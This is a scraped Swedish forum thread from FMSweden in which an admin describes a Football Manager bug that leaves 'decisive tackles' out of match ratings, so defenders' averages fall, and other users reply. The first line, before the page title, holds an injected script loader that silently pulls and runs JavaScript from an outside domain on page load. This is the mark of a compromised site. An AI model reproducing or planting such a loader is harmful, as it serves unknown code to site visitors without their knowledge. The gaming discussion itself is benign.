;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dannes Lördagsgodis – Snittbetygsbuggen – Guider & annat – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Dannes Lördagsgodis - Snittbetygsbuggen

11 Inlägg
8 Users
22 Reactions
1,403 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Topic starter  

Upplever du också att dina spelares snittbetyg är sämre än vad du hoppades på? Du är inte ensam! Faktum är att dagens snittbetyg generellt saknar viktiga värden och läser av situationer på ett sätt som kanske inte riktigt skulle göras egentligen. Sätt på kaffekokaren, ta fram din favoritkopp och mys ner dig i soffan för nu ska jag ta dig med på ett efterlängtat lördagsgodis!

-----

Det började för några veckor sedan när jag var inne på min andra säsong med Bournemouth. Andra säsongen innebär alltså första säsongen i Premier League och att gå från ett favorittippat Championship-lag som lyckades motsvara förväntningarna med bravur till ett lag som är nederlagstippat, eller åtminstone mittenlagstippat på sin höjd, i Premier League är en utmaning som verkligen heter duga. När du verkligen är bäst är det svårt att notera samma detaljer som när du inte är bäst längre, kanske inte ens ett lag på den övre halvan. Och när jag upptäckte detta så slog det undan benen på mig och jag föll handlöst ned på marken.

Vad var det som hände? Mina ytterbackar underpresterade något som jag skulle vilja benämna som katastrofalt dåligt, sett till snittbetyg. Min vänsterback Lloyd Kelly började närma sig ett snittbetyg på 5(!) vilket startade ett bråk mellan mig och honom som slutade i att han lämnade för spel i ligakonkurrenten Aston Villa. Samtidigt lade jag märke till att resterande ytterbackar inte gjorde det så mycket bättre heller och det var där och då som min frågeställning väcktes till liv; vad är det som händer?

-----

Jag gick igenom min taktik, spelarnas roller, laginstruktioner, personliga instruktioner, träning, moral, utveckling, ja allting. Men ingenstans kunde jag konstatera att spelaren i fråga var så fruktansvärt dålig som hans snittbetyg talade om för mig att han var. Moralen var visserligen inte särskilt bra men det hängde ihop med våra bråk så det såg jag mellan fingrarna. Hursomhelst, jag begav mig ut på jakt i internet-skogen för att finna svar på min fråga. Under den här jakten började jag även notera liknande situationer med mina innermittfältare och till viss del mittbackarna, det vill säga spelare som är längre ner i banan och med en hel del försvarsuppgifter. Offensivt såg det bättre ut, men inte exceptionellt.

Därefter började jag få små svar på mina migränanfall och ett plus ett blev till slut en aha-upplevelse dessutom. Spelarens snittbetyg hämtas ur matchbetygen som spelaren samlar på sig under match. Vad spelaren lyckas med och misslyckas med blir matchbetyget som sammantaget byggs på snittbetyget, är ni med mig? Men vad är det då som räknas med i ett matchbetyg?

Om du går in på valfri spelare, håller muspekaren över Rapporter och därefter väljer Form så kommer du till rätt ställe. Enligt FM så finns det 17 + 2 händelser som resulterar i ett matchbetyg(jag tog medvetet bort kondition vid matchens slut för jag är helt säker på att det inte räknas med). Passningsförsök, Lyckade passningar, Avgörande passningar, Klara målchanser skapade, Tacklingsförsök, Vunna tacklingar, Avgörande tacklingar, Luftdueller, Vunna luftdueller, Viktiga nickar, Skottförsök, Skott på mål, Gjorda brytningar, Dribblingar, Offside, Regelbrott samt Regelbrott mot är de 17 rubrikerna som tillsammans med assist och mål utgör matchbetyget.

-----

Men! Vad om jag avslöjade för dig att alla trots allt inte räknas? Alla utom Avgörande tacklingar räknas och varför den inte räknas beror till största sannolikhet på en bugg, dvs att spelet omedvetet inte lyckas registrera detta. Tar vi då fram kalkylatorn igen och slår ett plus ett så kan vi ganska så omgående förstå att defensivt inriktade spelares matchbetyg tappar en otroligt viktig bit, kanske rentav den viktigaste? Det är sedan den senaste patchen(uppdateringen) av spelet som det här inträffade vilket också ger mig svar på frågan “Varför det gick så bra för dem första säsongen i Championship” utöver att vi var fantastiska på alla sätt och vis.

Ni kan själva dubbelkolla detta och dessutom ta fram statistik för resten av spelarna på ditt save. Sök exempelvis efter spelare som har spelat 20 matcher i Premier League och är ytterbackar. Får ni ett lika dåligt resultat som mig där knappt någon får ett godkänt resultat(som rimligtvis bör vara 7,00)? Utöver detta problem så är det dessutom generellt svårt för en spelare att få ett högre snittbetyg. Gör en ny sökning och ta fram forwards; hur många har över 8,00 i snittbetyg trots alla mål de gjort?

-----

Jag är inte ute efter att klaga och inleda en häxjakt utan endast göra er medvetna så att ni inte hamnar i samma situation som mig; bråka med en bra spelare som sett till hans matchbetyg underpresterar något enorm som i sin tur leder till en försäljning. Mitt råd är att börja forska mer i vad spelaren faktiskt gör i förhållande till hans uppdrag på planen, sammanlänkat med hans kollegor. Gör han bra ifrån sig så är han trots allt en tillräckligt bra spelare för ditt lag och din taktik.

Tyvärr fallerar det ändå en del eftersom spelare med riktigt dåliga matchbetyg tenderar att skapa frågor medialt, sämre moral och till slut en hämmande utveckling som fotbollsspelare. Det finns alltid två sidor av ett mynt och med den här guldpengen jag lagt fram så blir det;

Framsida: Du ska inte stirra dig blind på matchbetyg
Baksida: Spelarna hämmas trots allt

Tack för att ni tog er tid, hoppas kaffet smakade bra och gott nytt år på er!

raca14 reacted
Citera
(@svinhufvud)
New Member

Aha... jag som redan rensat väck alla underpresterande ytterbackar i IFK Haninge med toklåga snittbetyg som annars såg bra ut....  🙂

SvaraCitera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin

Älskar nörderiet. Stör mig sjukt mycket på just detta 

PW

SvaraCitera
JOSSTICK
(@josstick)
Estimable Member

Minns på FM05 när man kunde ha i princip hela laget på 9or och 10or vissa matcher.
Inte sett en keeper få en 10a i matchbetyg på många år och upplagor nu (verkligt? jodå - tråkigt? ajjemen)

SvaraCitera
raca14
(@raca14)
Reputable Member

Är detta något som man känner till på SI och som kanske kommer att patchas igen för att slippa denna skiten rent ut sagt?

SvaraCitera
Phogge
(@phogge)
Active Member

Har alltid kört två ytterbackar på bänken innan jag läste det här inlägget.

Både vänster och höger underpresterade alltid. Men nu tar jag det lite lugnare då eftersom det verkar vara en bugg.

Tack för inlägget Daniel! 

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Topic starter  
Postad av: @raca14

Är detta något som man känner till på SI och som kanske kommer att patchas igen för att slippa denna skiten rent ut sagt?

Ja, med all förmodan. Det vore väldigt konstigt om de inte hade koll på detta eftersom det tillsammans med en rad andra buggar är väldigt högt uppe på tapeten på deras officiella forum just nu.

raca14 reacted
SvaraCitera
TommyE
(@tommye)
Eminent Member

Ja banne mig.. ytterbackarna i LLM-laget jag kör med har nog i 8 av 10 matcher haft det sämsta snittbetyget och rotation bland lagets ytterbackar har inte hjälpt. Då får man försöka ha en smula tålamod och hoppas på att det patchas till ? 

SvaraCitera
JOSSTICK
(@josstick)
Estimable Member

Detta SKA nu vara fixat med nattens uppdatering...den som lever får se...

SvaraCitera
Chillaner
(@chillaner)
Active Member

Landskronas kontrakt är felaktiga. Kan jag själv fixa men lite drygt.

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Topic starter  
Postad av: @chillaner

Landskronas kontrakt är felaktiga. Kan jag själv fixa men lite drygt.

Inget som har direkt anknytning till själva tråden.

Hänvisar till FMSU-tråden alternativt till Pelle Antonsson på Twitter som har hand om den officiella uppdateringen riktat mot Sverige!

SvaraCitera
Share: